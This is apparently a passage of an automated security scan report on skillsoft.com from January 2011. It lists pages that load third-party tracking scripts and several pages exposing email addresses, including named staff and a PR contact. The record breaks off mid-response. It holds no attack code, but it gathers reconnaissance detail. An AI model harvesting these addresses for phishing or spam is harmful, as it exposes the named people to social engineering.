Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48862
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.68. http://skillsoft.com/products/live_learning/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/live_learning/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/live_learning/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51184
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>

<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.69. http://skillsoft.com/products/live_learning/demos.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/live_learning/demos.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/live_learning/demos.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53300
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>

<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.70. http://skillsoft.com/products/lms_integration.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/lms_integration.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/lms_integration.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51663
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.71. http://skillsoft.com/products/virtual_classroom/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/virtual_classroom/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/virtual_classroom/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54843
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.72. http://skillsoft.com/satisfaction/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /satisfaction/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /satisfaction/ HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8610
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.73. http://skillsoft.com/search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /search.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 32667
Content-Type: text/html
Expires: Mon, 03 Jan 2011 12:47:49 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.74. http://skillsoft.com/sitemap.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /sitemap.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58227
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.75. http://skillsoft.com/solutions/IT_certification.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /solutions/IT_certification.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/IT_certification.asp HTTP/1.1
Host: skillsoft.com
Proxy-Connection: keep-alive
Referer: http://skillsoft.com/solutions/small-to-medium_business.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_referrer=; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ll_engine=NA; ll_keyword=NA; ll_type=%3Ans; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; __utmc=142141232; __utmb=142141232.4.10.1294058476; __unam=b9813ea-12d4be7ca8c-7469561-1; __qca=P0-558066078-1294058638877

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43010
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.76. http://skillsoft.com/solutions/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /solutions/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/default.asp HTTP/1.1
Host: skillsoft.com
Proxy-Connection: keep-alive
Referer: http://skillsoft.com/solutions/small-to-medium_business.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_referrer=; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ll_engine=NA; ll_keyword=NA; ll_type=%3Ans; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; __utmc=142141232; __utmb=142141232.4.10.1294058476; __unam=b9813ea-12d4be7ca8c-7469561-1; __qca=P0-558066078-1294058638877

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37950
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.77. http://skillsoft.com/solutions/small-to-medium_business.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /solutions/small-to-medium_business.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/small-to-medium_business.asp HTTP/1.1
Host: skillsoft.com
Proxy-Connection: keep-alive
Referer: http://skillsoft.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_referrer=; ll_engine=NA; ll_keyword=NA; ll_type=%3Ans; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; __utmc=142141232; __utmb=142141232.2.10.1294058476

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42526
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.78. http://skillsoft.com/terms.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /terms.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /terms.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50258
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

5. Email addresses disclosed  previous
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://skillsoft.com/about/contact/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/contact/default.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/contact/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42638
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:Information@SkillSoft.com">Information@SkillSoft.com</a>
...[SNIP]...
<a href="mailto:isr@skillsoft.com"><u>isr@skillsoft.com</u>
...[SNIP]...
<a href="mailto:Donna_Ayer@skillsoft.com">Donna_Ayer@skillsoft.com</a>
...[SNIP]...
<a href="mailto:ir@skillsoft.com"><u>ir@skillsoft.com</u>
...[SNIP]...

5.2. http://skillsoft.com/about/office_locations.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/office_locations.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/office_locations.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45416
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:Information@SkillSoft.com">Information@SkillSoft.com</a>
...[SNIP]...
<a title=mailto:DublinHR@skillsoft.com href="mailto:DublinHR@skillsoft.com">DublinHR@skillsoft.com</a>
...[SNIP]...
<a href="mailto:apac@skillsoft.com">apac@skillsoft.com</a>
...[SNIP]...
<a href="mailto:internationalinformation@SkillSoft.com">internationalinformation@SkillSoft.com</a>
...[SNIP]...
<a href="mailto:canadian_careers@skillsoft.com">Canadian_Careers@skillsoft.com</a>
...[SNIP]...

5.3. http://skillsoft.com/about/press_room/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/

Issue detail

The following email address was disclosed in the response:

Request

GET /about/press_room/ HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40728
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:Donna_Ayer@skillsoft.com">
...[SNIP]...

5.4. http://skillsoft.com/about/press_room/press_releases/December_09_10_Awards.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_09_10_Awards.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/press_room/press_releases/December_09_10_Awards.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48605
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:Donna_Ayer@SkillSoft.com">Donna_Ayer@SkillSoft.com</a>
...[SNIP]...
<a href="mailto:Lauren_Whittenberg@lpp.com">Lauren_Whittenberg@lpp.com</a>
...[SNIP]...

5.5. http://skillsoft.com/about/press_room/press_releases/December_13_10_ThomasNelson.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_13_10_ThomasNelson.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/press_room/press_releases/December_13_10_ThomasNelson.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50406
Content-Type: text/html
